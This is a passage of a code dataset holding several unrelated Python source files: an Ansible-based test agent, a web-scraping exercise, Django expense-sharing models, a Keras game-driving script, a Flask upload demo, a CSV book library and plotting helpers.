extravars.pop('sol_command', None)\n if 'sut_password' in system:\n extravars['sut_password'] = system['sut_password']\n else:\n extravars.pop('sut_password', None)\n if 'reboot_watchdog_timeout' in system:\n extravars['reboot_watchdog_timeout'] = system['reboot_watchdog_timeout']\n else:\n extravars.pop('reboot_watchdog_timeout', None)\n if 'install_watchdog_timeout' in system:\n extravars['install_watchdog_timeout'] = system['install_watchdog_timeout']\n else:\n extravars.pop('install_watchdog_timeout', None)\n else:\n extravars['fqdn'] = system\n #Remove any install options set for previous SUTs in this topic if they exist\n extravars.pop('kernel_options', None)\n extravars.pop('ks_meta', None)\n extravars.pop('sol_command', None)\n extravars.pop('reboot_watchdog_timeout', None)\n extravars.pop('install_watchdog_timeout', None)\n print (\"Starting job for %s.\" % extravars['fqdn'])\n thread, runner = ansible_runner.run_async(\n private_data_dir=\"/usr/share/dci-rhel-agent/\",\n inventory=\"/etc/dci-rhel-agent/inventory\",\n verbosity=int(environ.get('VERBOSITY')),\n playbook=\"dci-rhel-agent.yml\",\n extravars=extravars,\n quiet=False\n )\n threads_runners[(thread, runner)] = extravars['fqdn']\n\n # wait for all jobs\n for t, _ in threads_runners:\n t.join()\n print(\"All jobs terminated.\")\n\n global number_of_failed_jobs\n # check if some jobs failed\n for t, r in threads_runners:\n fqdn = threads_runners[(t, r)]\n if r.rc != 0:\n print(\"Job for %s failed, rc: %s, status: %s \" % (fqdn, r.rc, r.status))\n number_of_failed_jobs += 1\n\n\ndef main():\n if environ.get('DCI_CLIENT_ID') is None:\n print (\"Environment variable DCI_CLIENT_ID not set.\")\n sys.exit(1)\n\n tests_only = True if environ.get('TESTS_ONLY') == 'True' else False\n\n # Read the settings file\n sets = load_settings()\n\n if not tests_only:\n # Run the update playbook once before jobs.\n r = ansible_runner.run(\n private_data_dir=\"/usr/share/dci-rhel-agent/\",\n inventory=\"/etc/dci-rhel-agent/inventory\",\n verbosity=1,\n playbook=\"dci-update.yml\",\n extravars=sets,\n quiet=False\n )\n if r.rc != 0:\n print (\"Update playbook failed. {}: {}\".format(r.status, r.rc))\n sys.exit(1)\n # Check if the settings contain multiple topics and process accordingly\n if 'topics' in sets:\n # Break up settings file into individual jobs by topic\n jobs = sets['topics']\n # Loop over each job and provision system(s)\n for idx, current_job in enumerate(jobs):\n print (\"Beginning provision/test jobs for topic %s\" % current_job['topic'])\n current_job['local_repo'] = sets['local_repo']\n current_job['local_repo_ip'] = sets['local_repo_ip']\n current_job['tests_only'] = tests_only\n provision_and_test(current_job)\n else:\n print ('Incompatible settings file. Topics not found. Please update settings file format.')\n sys.exit(1)\n sys.exit(number_of_failed_jobs)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"dci-rhel-agent/entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":6693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"264366955","text":"from bs4 import BeautifulSoup\nfrom urllib import request\nurl = \"https://github.com/humanitiesprogramming/scraping-corpus\"\nhtml = request.urlopen(url).read()\nprint(html[0:2000])\nsoup = BeautifulSoup(html, 'lxml')\nprint(soup.find_all('a')[0:10])\nfor item in soup.find_all('a')[0:10]:\n print('=======')\n print(item.text.replace('\\n', ''))\n\nfor link in soup.select(\"td.content a\"):\n print(link.text)\n\nlinks_html = soup.select('td.content a')\nurls = []\nfor link in links_html:\n url = link['href']\n urls.append(url)\nprint(urls)\n\nlinks_html = soup.select('td.content a')\nurls = []\nfor link in links_html:\n url = link['href'].replace('blob/', '')\n urls.append(\"https://raw.githubusercontent.com\" + url)\nprint(urls)\n\ncorpus_texts = []\nfor url in urls:\n print(url)\n html = request.urlopen(url).read()\n soup = BeautifulSoup(html, \"lxml\")\n text = soup.text.replace('\\n', '')\n corpus_texts.append(text)\n\nprint(corpus_texts)\n","sub_path":"python/Scraping.py","file_name":"Scraping.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"356309078","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Top-level package for adnipy.\"\"\"\n\n__author__ = \"\"\"Maximilian Cosmo Sitter\"\"\"\n__email__ = \"msitter@smail.uni-koeln.de\"\n__version__ = \"0.0.1\"\n\n# Let users know if they're missing any of our hard dependencies\nimport matplotlib\nimport pandas as pd\n\nfrom .adnipy import (\n drop_dynamic,\n get_matching_images,\n groups,\n longitudinal,\n read_csv,\n rid,\n standard_column_names,\n standard_dates,\n standard_index,\n timedelta,\n timepoints,\n)\n\ndel matplotlib, pd\n\n\n# module level doc-string\n__doc__ = \"\"\"Process ADNI study data with adnipy.\"\"\"\n","sub_path":"adnipy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"506766312","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django import forms\n# Create your models here.\n\nclass profile(models.Model):\n\t# name = models.CharField(max_length = 100)\n\t# password = models.CharField(max_length = 150)\n\tuser = models.OneToOneField(User,on_delete=models.PROTECT)\n\tfirstname = models.CharField(max_length = 100,blank=True,)\n\tsecondname = models.CharField(max_length = 100,blank=True)\n\temail =models.EmailField(default=\"\",blank=True)\n\tnumber = models.IntegerField(default=0,blank=True)\n\tcity = models.CharField(max_length = 100,blank=True)\n\timage = models.ImageField(upload_to='images/',blank=True)\n\tuserid = models.CharField(max_length=100,blank=True,default=\"\")\n\n\tdef __str__(self):\n\t\treturn self.user.username\n\ndef create_profile(sender, **kwargs):\n\tif kwargs['created']:\n\t\tuser_profile = profile.objects.create(user=kwargs['instance'])\n\npost_save.connect(create_profile, sender=User)\n\nclass Friend(models.Model):\n\tusers = models.ManyToManyField(User)\n\tdebt = models.IntegerField(default=0,blank=True)\n\tcurrent_user = models.ForeignKey(User, related_name='owner',null=True,on_delete=models.CASCADE)\n\t@classmethod\n\tdef make_friend(cls,current_user,new_friend):\n\t\tfriend, created = cls.objects.get_or_create(\n\t\t\tcurrent_user=current_user\n\t\t)\n\t\tfriend.users.add(new_friend)\n\t\tfriend, created = cls.objects.get_or_create(\n\t\t\tcurrent_user=new_friend\n\t\t)\n\t\tfriend.users.add(current_user)\n\n\ndef create_friend(sender,**kwargs):\n\tif kwargs['created']:\n\t\tuser_friends = Friend(User)\n\t\tuser_friends.user = kwargs['instance']\n\npost_save.connect(create_friend, sender=User)\n\nCHOICES=[\n('a','paid by you and split equally'),\n('b','paid by your friend and split equally'),\n('c','You owe to him completely'),\n('d','He owe to you completely'),\n('e',(\n('1','paid by you and split by shares'),('2','paid by friend and split by shares'),('3','paid by you and split by percentages'),('4','paid by friend and split by percentages'),\n)),\n]\n\n\nclass Transactions(models.Model):\n\tusers = models.ManyToManyField(User)\n\tcurrent_user = models.ForeignKey(User, related_name='owners',null=True,on_delete=models.CASCADE)\n\tamount = models.IntegerField(default=0,blank=True)\n\tpayable = models.IntegerField(default=0,blank=True)\n\tstatus = models.IntegerField(default=0,blank=True)\n\tpair = models.IntegerField(default=0,blank=True)\n\t# net = models.IntegerField(default=0,blank=True)\n\tgroup = models.CharField(default='none',max_length=100)\n\ttype = models.CharField(max_length=10,choices=CHOICES,default='green')\n\tdesc = models.CharField(max_length = 100,blank = False)\n\ttag = models.CharField(max_length = 100,blank = False)\n\tcurrent_user_pk = models.IntegerField(default=0,blank=True)\n\tsplit = models.IntegerField(default=0,blank=True)\n\tamount_you = models.IntegerField(default=0,blank=True)\n\tamount_friend = models.IntegerField(default=0,blank=True)\n\t@classmethod\n\tdef add_transaction(cls,current_user,new_friend,amount,type,desc,tag,split,amount_you,amount_friend):\n\t\tif(type=='a'):\n\t\t\ttran1,created = cls.objects.get_or_create(current_user = current_user,amount = amount,payable=amount/2,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran1.users.add(new_friend)\n\n\t\t\ttran2,created = cls.objects.get_or_create(current_user = new_friend,amount = amount,payable=-amount/2,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran2.users.add(current_user)\n\n\t\t\ttran1.pair = tran2.pk\n\t\t\ttran1.current_user_pk = new_friend.pk\n\t\t\ttran1.save()\n\n\t\t\ttran2.pair = tran1.pk\n\t\t\ttran2.current_user_pk = current_user.pk\n\t\t\ttran2.save()\n\t\t\treturn tran1.payable\n\n\t\telif(type=='b'):\n\t\t\ttran1,created = cls.objects.get_or_create(current_user = current_user,amount = amount,payable=-amount/2,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran1.users.add(new_friend)\n\n\t\t\ttran2,created = cls.objects.get_or_create(current_user = new_friend,amount = amount,payable=amount/2,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran2.users.add(current_user)\n\n\t\t\ttran1.pair = tran2.pk\n\t\t\ttran1.current_user_pk = new_friend.pk\n\t\t\ttran1.save()\n\n\t\t\ttran2.pair = tran1.pk\n\t\t\ttran2.current_user_pk = current_user.pk\n\t\t\ttran2.save()\n\t\t\treturn tran1.payable\n\n\t\telif(type=='c'):\n\t\t\ttran1,created = cls.objects.get_or_create(current_user = current_user,amount = amount,payable=-amount,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran1.users.add(new_friend)\n\n\t\t\ttran2,created = cls.objects.get_or_create(current_user = new_friend,amount = amount,payable=amount,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran2.users.add(current_user)\n\n\t\t\ttran1.pair = tran2.pk\n\t\t\ttran1.current_user_pk = new_friend.pk\n\t\t\ttran1.save()\n\n\t\t\ttran2.pair = tran1.pk\n\t\t\ttran2.current_user_pk = current_user.pk\n\t\t\ttran2.save()\n\t\t\treturn tran1.payable\n\n\t\telif(type=='d'):\n\t\t\ttran1,created = cls.objects.get_or_create(current_user = current_user,amount = amount,payable=amount,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran1.users.add(new_friend)\n\n\t\t\ttran2,created = cls.objects.get_or_create(current_user = new_friend,amount = amount,payable=-amount,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran2.users.add(current_user)\n\n\t\t\ttran1.pair = tran2.pk\n\t\t\ttran1.current_user_pk = new_friend.pk\n\t\t\ttran1.save()\n\n\t\t\ttran2.pair = tran1.pk\n\t\t\ttran2.current_user_pk = current_user.pk\n\t\t\ttran2.save()\n\t\t\treturn tran1.payable\n\n\t\telif(type=='e'):\n\t\t\tif(split == 0):\n\t\t\t\tx = int(-amount_friend * amount/100)\n\t\t\telif(split == 1):\n\t\t\t\tx = int(amount_you*amount/100)\n\t\t\ttran1,created = cls.objects.get_or_create(current_user = current_user,amount = amount,payable=x,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran1.users.add(new_friend)\n\n\t\t\ttran2,created = cls.objects.get_or_create(current_user = new_friend,amount = amount,payable=-x,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran2.users.add(current_user)\n\n\t\t\ttran1.pair = tran2.pk\n\t\t\ttran1.current_user_pk = new_friend.pk\n\t\t\ttran1.save()\n\n\t\t\ttran2.pair = tran1.pk\n\t\t\ttran2.current_user_pk = current_user.pk\n\t\t\ttran2.save()\n\t\t\treturn tran1.payable\n\n\t\telif(type=='f'):\n\t\t\tif(split == 0):\n\t\t\t\tx = int(-amount_friend)\n\t\t\telif(split == 1):\n\t\t\t\tx = int(amount_you)\n\t\t\ttran1,created = cls.objects.get_or_create(current_user = current_user,amount = amount,payable=x,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran1.users.add(new_friend)\n\n\t\t\ttran2,created = cls.objects.get_or_create(current_user = new_friend,amount = amount,payable=-x,type=type,desc=desc,tag=tag,split=0,amount_you=0,amount_friend=0)\n\t\t\ttran2.users.add(current_user)\n\n\t\t\ttran1.pair = tran2.pk\n\t\t\ttran1.current_user_pk = new_friend.pk\n\t\t\ttran1.save()\n\n\t\t\ttran2.pair = tran1.pk\n\t\t\ttran2.current_user_pk = current_user.pk\n\t\t\ttran2.save()\n\t\t\treturn tran1.payable\n\n\n# class add_debt(models.Model):\n# \tusers = models.ManyToManyField(User)\n# \tcurrent_user = models.ForeignKey(User, related_name='owners_debts',null=True,on_delete=models.CASCADE)\n# \tdebt_between = models.IntegerField(default=0,blank=True)\n# \t@classmethod\n# \tdef add_debting(cls,current_user,new_friend):\n# \t\tbalance,created = cls.objects.get_or_create(current_user = current_user,users = new_friend)\n# \t\tbalance.users.add(new_friend)\n# \t\tbalance,created = cls.objects.get_or_create(current_user = new_friend , users = current_user)\n# \t\tbalance.users.add(current_user)\nclass Pair(models.Model):\n\tcurrent_user = models.ForeignKey(User, related_name='in_groups',null=True,on_delete=models.CASCADE)\n\tamount = models.IntegerField(default=0,blank=True) \n\nclass Add_group(models.Model):\n\t\n\tGroupName = models.CharField(max_length=100,blank=True)\n\tDescription = models.CharField(max_length = 100,blank=True)\n\t# Tag = models.CharField(max_length = 100,blank=True)\n\tgroup_pk = models.IntegerField(default=0,blank=True) \n\tusers = models.ManyToManyField(Pair)\n\t\n\t@classmethod \n\tdef creating_group(cls,current_user,desc,name,pk):\n\t\tgroup,created = cls.objects.get_or_create(group_pk=pk,Description=desc,GroupName=name)\n\t\tp = Pair(current_user=current_user)\n\t\tp.save()\n\t\tgroup.users.add(p)\n\n\t@classmethod\n\tdef add_member(cls,current_user,pk):\n\t\tgroup,created = cls.objects.get_or_create(group_pk=pk)\n\t\tp = Pair(current_user=current_user)\n\t\tp.save()\n\t\tgroup.users.add(p)\n\t#group = models.ManyToManyField(GroupName)\n\n\tdef __str__(self):\n\t\treturn self.GroupName\n\nclass Group_Transactions(models.Model):\n\tgroup = models.ManyToManyField(Add_group)\n\tadd_group_key = models.IntegerField(default=0,blank=True)\n\tDescription = models.CharField(max_length = 100,blank=True)\n\tTag = models.CharField(max_length = 100,blank=True)\n\tsplit = models.BooleanField(default=True)\n\tamt_paid_by_him = models.CharField(max_length = 10000000,blank=True)\n\tamt_for_him = models.CharField(max_length = 10000000,blank=True,default=\"\")\n\n\t@classmethod\n\tdef add_group_transaction(cls,desc,tag,split,str1,str2,d1,d2,pk):\n\t\tgroup_trans_obj,created = cls.objects.get_or_create(Description=desc,Tag=tag,split=split,amt_paid_by_him=str1,amt_for_him=str2)\n\t\tadd_group_obj = Add_group.objects.get(group_pk=pk)\n\t\tgroup_trans_obj.group.add(add_group_obj)\n\t\tgroup_trans_obj.add_group_key = pk\n\t\td3 = {}\n\t\tgroup_balance = {}\n\t\tg=[]\n\t\tfor key,value in d1.items():\n\t\t\td3[key] = value - d2[key]\n\t\tpairs = add_group_obj.users.all()\n\t\tfor x in pairs:\n\t\t\tk = x.current_user.username\n\t\t\tv = x.amount\n\t\t\tgroup_balance[k] = v + d3[k]\n\t\t\tx.amount = group_balance[k]\n\t\t\tx.save()\n\t\tgroup_trans_obj.save()\n\t\treturn d3\n\n\n\n\t\t# N = len(group_balance)\n\t\t# for key,value in group_balance.items():\n\t\t# \tg = g + [[key,value]]\n\t\t# # g=[[7,-10],[19,-10],[6,20]]\n\t\t# l1=[]\n\t\t# l2=[]\n\t\t# graph=[]\n\t\t# final={}\n\t\t# f={}\n\t\t# j=0\n\t\t# for i in g:\n\t\t# \tfinal[i[0]]=j\n\t\t# \tf[j]=final[i[0]]\n\t\t# \tj=j+1\n\t\t# for i in range(N):\n\t\t# \tl3=[]\n\t\t# \tfor j in range(N):\n\t\t# \t\tl3=l3+[0]\n\t\t# \tgraph=graph+[l3]\n\t\t# for i in g:\n\t\t# \tif(i[1] == 0):\n\t\t# \t\tcontinue\n\t\t# \telif(i[1] > 0):\n\t\t# \t\tl1=l1+[i]\n\t\t# \telse:\n\t\t# \t\tl2=l2+[i]\n\t\t\n\t\t# def simplify(li1,li2,graph):\n\t\t# \tif(len(li1) == 0 or len(li2) == 0):\n\t\t# \t\treturn\n\t\t# \telse:\n\t\t# \t\ty=li1[0]\n\t\t# \t\tif(y[1] + li2[0][1] == 0):\n\t\t# \t\t\tgraph[final[y[0]]][final[li2[0][0]]] = graph[final[y[0]]][final[li2[0][0]]] + y[1]\n\t\t# \t\t\tsimplify(li1[1:],li2[1:],graph)\n\t\t# \t\telif(y[1] + li2[0][1] > 0):\n\t\t# \t\t\tgraph[final[y[0]]][final[li2[0][0]]] = graph[final[y[0]]][final[li2[0][0]]] - li2[0][1]\n\t\t# \t\t\ty[1] = y[1]+li2[0][1]\n\t\t# \t\t\tsimplify(li1,li2[1:],graph)\n\t\t# \t\telse:\n\t\t# \t\t\tgraph[final[y[0]]][final[li2[0][0]]] = graph[final[y[0]]][final[li2[0][0]]] + y[1]\n\t\t# \t\t\tli2[0][1]=y[1]+li2[0][1]\n\t\t# \t\t\tsimplify(li1[1:],li2,graph)\n\t\t# def f(l1,l2):\n\t\t# \tglobal graph\n\t\t# \tsimplify(l1,l2,graph)\n\n\t\t# f(l1,l2)\n\t\t# l11=[]\n\t\t# # print(graph)\n\t\t# def getMin(arr): \t\n\t\t# \tminInd = 0\n\t\t# \tfor i in range(1, N): \n\t\t# \t\tif (arr[i] < arr[minInd]): \n\t\t# \t\t\tminInd = i \n\t\t# \treturn minInd \n\t\t# def getMax(arr): \n\t\t# \tmaxInd = 0\n\t\t# \tfor i in range(1, N): \n\t\t# \t\tif (arr[i] > arr[maxInd]): \n\t\t# \t\t\tmaxInd = i \n\t\t# \treturn maxInd \n\t\t# def minOf2(x, y): \n\t\t# \treturn x if x < y else y \n\t\t# def minCashFlowRec(amount): \n\t\t# \tmxCredit = getMax(amount)\n\t\t# \tglobal l11\n\t\t# \tmxDebit = getMin(amount) \n\t\t# \tif (amount[mxCredit] == 0 and amount[mxDebit] == 0): \n\t\t# \t\treturn 0\n\t\t# \tmin = minOf2(-amount[mxDebit], amount[mxCredit]) \n\t\t# \tamount[mxCredit] -=min\n\t\t# \tamount[mxDebit] += min\n\t\t# \tl11=l11+[[mxDebit,min,mxCredit]]\n\t\t# \tminCashFlowRec(amount) \n\t\t# def minCashFlow(graph): \n\t\t# \tamount = [0 for i in range(N)] \n\t\t# \tfor p in range(N): \n\t\t# \t\tfor i in range(N): \n\t\t# \t\t\tamount[p] += (graph[i][p] - graph[p][i]) \n\t\t# \tminCashFlowRec(amount)\n\t\t# minCashFlow(graph)\n\t\t# need = []\n\t\t# for i in range(N):\n\t\t# \tl3=[]\n\t\t# \tfor j in range(N):\n\t\t# \t\tl3=l3+[0]\n\t\t# \tneed = need + [l3]\n\t\t# for i in l11:\n\t\t# \tneed[i[0]][i[2]] = i[1]\n\n\t\t# # print(need)","sub_path":"Split/splitwise/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"366126626","text":"import argparse\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport keras.models\r\n\r\nimport utils\r\n\r\n# Emulate an Xbox 360 controller:\r\n# https://github.com/tidzo/pyvjoy\r\nimport pyvjoy\r\n\r\n# Get the pixel data of a window:\r\n# Based on https://github.com/speeli/pygta5/blob/master/grabscreen.py\r\nfrom grabscreen import grab_screen\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-m', dest='model', type=str, help='trained model file')\r\n args = parser.parse_args()\r\n \r\n model = keras.models.load_model(args.model)\r\n\r\n MAX_VJOY = 32767\r\n j = pyvjoy.VJoyDevice(1)\r\n\r\n while True:\r\n # accelerate permanently\r\n j.set_button(13, 1)\r\n \r\n screen = grab_screen(wnd_title=utils.WINDOW_TITLE,\r\n dst_size=utils.CAPTURE_SIZE,\r\n src_offset=utils.WINDOW_OFFSETS)\r\n screen_mod = utils.preprocess(screen)\r\n \r\n # predict the steering angle for the current image\r\n steering_angle = float(model.predict(np.array([screen_mod]), batch_size=1))\r\n \r\n # translate to vjoy axis value\r\n j_steering = np.interp(steering_angle, [-.5, +.5], [0, MAX_VJOY])\r\n print('{} angle={}'.format('LEFT' if steering_angle < 0 else 'RIGHT', steering_angle))\r\n\r\n j.data.wAxisX = int(j_steering)\r\n j.update()\r\n\r\n cv2.imshow('screen', screen_mod)\r\n if cv2.waitKey(10) & 0xFF == 27: # ESC\r\n j.reset()\r\n j.update()\r\n cv2.destroyAllWindows()\r\n break\r\n\r\n\r\nif __name__ == '__main__':\r\n main() \r\n","sub_path":"drive.py","file_name":"drive.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"303136219","text":"import os\nfrom flask import Flask, jsonify, render_template, request, url_for, send_from_directory\nfrom werkzeug.utils import secure_filename\n\nIS_SERVERLESS = bool(os.environ.get('SERVERLESS'))\nprint(IS_SERVERLESS)\n\napp = Flask(__name__)\n# 初始化上传临时目录\ndef init_upload_dir():\n UPLOAD_DIR = '/tmp/uploads' if IS_SERVERLESS else os.getcwd() + '/uploads'\n if not os.path.exists(UPLOAD_DIR):\n os.makedirs(UPLOAD_DIR)\n app.config['UPLOAD_DIR'] = UPLOAD_DIR\n\ninit_upload_dir()\n\n@app.route(\"/\")\ndef index():\n return render_template('index.html')\n\n@app.route(\"/users\", methods=['GET', 'POST'])\ndef users():\n if request.method == 'POST':\n print(request.form)\n uid = request.form.get('uid');\n user = {'uid': uid, 'name': 'test1'}\n return jsonify(data=user)\n else:\n limit = request.args.get('limit')\n data = {\n 'count': limit or 2,\n 'users': [{'name': 'test1'}, {'name': 'test2'}]\n }\n return jsonify(data=data)\n\n@app.route(\"/users/\")\ndef get_user(id):\n return jsonify(data={'name': 'test1'})\n\n# 上传文件示例\n@app.route('/upload',methods=['POST'])\ndef upload():\n if request.method == 'POST':\n if 'avatar' not in request.files:\n res = {\"error\": \"No avatar file upload\"}\n return jsonify(data=res)\n avatar = request.files['avatar']\n\n if avatar.filename == '':\n res = {\"error\": \"No avatar file selected\"}\n return jsonify(data=res)\n\n if avatar:\n filename = secure_filename(avatar.filename);\n filePath = os.path.join(app.config['UPLOAD_DIR'], filename)\n avatar.save(filePath)\n uploadUrl = url_for('uploaded_file', filename=filename)\n res = {'upload': uploadUrl}\n return jsonify(data=res)\n\n@app.route('/uploads/')\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOAD_DIR'], filename)\n\n# 启动服务,监听 9000 端口,监听地址为 0.0.0.0\napp.run(debug=IS_SERVERLESS != True, port=9000, host='0.0.0.0')\n","sub_path":"Webfunc-FlaskDemo/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"577224010","text":"import csv\nimport os\nfrom .DB_conn import DatabaseConnection\n\nMY_LIBRARY = 'books.csv'\n\ndef get_all():\n \"\"\"\n csv file\n first line headers\n :return: list of dict [{name: str, author: str, read: bool},{},{}....] None if empty\n \"\"\"\n try:\n with open(MY_LIBRARY, 'r') as f:\n return _list_to_library(list(csv.reader(f))[1:])\n except FileNotFoundError:\n pass # return None\n\n\ndef _list_to_library(book_list):\n try:\n return [{'name': book[0], 'author': book[1], 'read': book[2]} for book in book_list]\n except IndexError:\n raise IndexError('Incorrect book_list Format')\n\n\ndef append(book):\n \"\"\"\n\n :param book: (name, author, read)\n :return: None\n \"\"\"\n with open(MY_LIBRARY, 'a', newline='') as f:\n writer = csv.DictWriter(f, fieldnames=['name', 'author', 'read'])\n if f.tell() == 0:\n writer.writeheader()\n try:\n writer.writerow({'name': book[0], 'author': book[1], 'read': book[2]})\n except IndexError:\n raise IndexError('Incorrect book Format')\n\n\ndef delete_book(att, att_value):\n \"\"\"\n\n :param att: attribute in dict to look by\n :param att_value: value of attribute to compare too\n :return: boolean for is_deleted\n \"\"\"\n my_library = get_all()\n is_deleted = False\n try:\n os.remove(MY_LIBRARY)\n except (FileExistsError, FileNotFoundError):\n raise FileExistsError\n else:\n for book in my_library:\n try:\n if book[att] != att_value:\n b = (book['name'], book['author'], book['read'])\n append(b)\n else:\n is_deleted = True;\n except KeyError:\n raise KeyError(f'{att} Is not a key')\n return is_deleted\n\n\ndef find_book(att, att_value):\n \"\"\"\n\n :param att: attribute in dict to look by\n :param att_value: value of attribute to compare too\n :return: None\n \"\"\"\n my_library = get_all()\n for book in my_library:\n try:\n if book[att] == att_value:\n return book\n except KeyError:\n raise KeyError('{att} Is not a key')\n pass\n\n\ndef mark_as_read(book):\n \"\"\"\n\n :param book: dict {name: S, auther: S, read S}\n :return: True for update, False else\n \"\"\"\n if delete_book('name', book['name']):\n append((book['name'], book['author'], True))\n return True\n return False\n","sub_path":"Milestone2/utils/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"556165214","text":"import math\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom altbicycle import AltBicycle\n\n\nclass AltNoiseBicycle(AltBicycle):\n \"\"\"Implementation of bicycle model from used in works of Althoff et al.\n with inputs as acceleration and steering angle plus sensing noise\"\"\"\n\n def __init__(self, mu, deltaT, initialspeed, noisecovariance=np.zeros((6, 6))):\n # Constants\n super(AltNoiseBicycle, self).__init__(mu, deltaT, initialspeed)\n self.cov = noisecovariance\n self.measurements = []\n\n def sense(self):\n noise = np.zeros((6, 1))\n self.measurements.append(noise)\n\n def run(self, ax, delta):\n super(AltNoiseBicycle, self).run(ax, delta)\n self.sense()\n\n def show_meas(self, legend=\"Path\"):\n \"\"\"Plot the path of the model\"\"\"\n plt.plot(self.measurements[0], self.measurements[1], label=legend)\n plt.legend()\n plt.draw()\n","sub_path":"sensealtbicycle.py","file_name":"sensealtbicycle.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"458381094","text":"from importlib import import_module\nimport dataloader\n\nclass data:\n def __init__(self, args):\n self.trainModule = import_module('data.' + args.trainData)\n self.testModule = [(\n import_module('data.' + d), d) for d in args.testData]\n self.args = args\n\n def getLoader(self):\n if not self.args.testOnly:\n trainSet = getattr(self.trainModule, self.args.trainData)(self.args)\n trainLoader = dataloader.MSDataLoader(\n self.args, trainSet, batch_size=self.args.batchSize,\n shuffle=True, pin_memory=True)\n else:\n trainLoader = None\n\n testSet = []\n for m in self.testModule:\n testSet = getattr(m[0], m[1])(self.args, train=False)\n\n testLoader = dataloader.MSDataLoader(\n self.args, testSet, batch_size=1,\n shuffle=False, pin_memory=True)\n\n return (trainLoader, testLoader)\n","sub_path":"code/data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"510151297","text":"from intake import models as intake_models\n\n\nclass MissingAnswersError(Exception):\n pass\n\n\ndef create_submission(form, organizations, applicant_id):\n \"\"\"Save the submission data\n \"\"\"\n submission = intake_models.FormSubmission(\n answers=form.cleaned_data,\n applicant_id=applicant_id)\n submission.save()\n submission.organizations.add(*organizations)\n intake_models.ApplicationEvent.log_app_submitted(applicant_id)\n return submission\n\n\ndef fill_pdfs_for_submission(submission):\n \"\"\"Checks for and creates any needed `FilledPDF` objects\n \"\"\"\n fillables = intake_models.FillablePDF.objects.filter(\n organization__submissions=submission)\n for fillable in fillables:\n fillable.fill_for_submission(submission)\n\n\ndef get_permitted_submissions(user, ids=None, related_objects=False):\n query = intake_models.FormSubmission.objects\n if related_objects:\n query = query.prefetch_related(\n 'logs__user__profile__organization')\n if ids:\n query = query.filter(pk__in=ids)\n if user.is_staff:\n return query.all()\n org = user.profile.organization\n return query.filter(organizations=org)\n\n\n\"\"\" These methods are used for test setup only \"\"\"\n\n\ndef create_for_organizations(organizations, **kwargs):\n submission = intake_models.FormSubmission(**kwargs)\n submission.save()\n submission.organizations.add(*organizations)\n return submission\n\n\ndef create_for_counties(counties, **kwargs):\n if 'answers' not in kwargs:\n msg = (\"'answers' are needed to infer organizations \"\n \"for a form submission\")\n raise MissingAnswersError(msg)\n organizations = [\n county.get_receiving_agency(kwargs['answers'])\n for county in counties\n ]\n return create_for_organizations(\n organizations=organizations, **kwargs)\n","sub_path":"intake/services/submissions.py","file_name":"submissions.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"561275052","text":"import matplotlib.pyplot as plt\n\ndef draw(x, y, title, xlabel, ylabel, legend, fn, fig):\n\tplt.figure(num = fig, figsize=(8, 5),)\n\t\n\tplt.plot(x, y, linewidth=1.0)\n\tplt.xlabel(xlabel)\n\tplt.ylabel(ylabel)\n\tplt.title(title)\n\tplt.legend([legend])\n\t#plt.show()\n\tplt.savefig(\"results/\" + fn + \".pdf\")\n\ndef drawMulti(x, y1, y2, title, xlabel, ylabel, legend1, legend2, fn, fig):\n\tplt.figure(num = fig, figsize=(8, 5),)\n\tplt.plot(x, y1)\n\tplt.plot(x, y2)\n\tplt.xlabel(xlabel)\n\tplt.ylabel(ylabel)\n\n\tplt.title(title)\n\tplt.legend([legend1,legend2])\n\t#plt.show()\n\tplt.savefig(\"results/\" + fn + 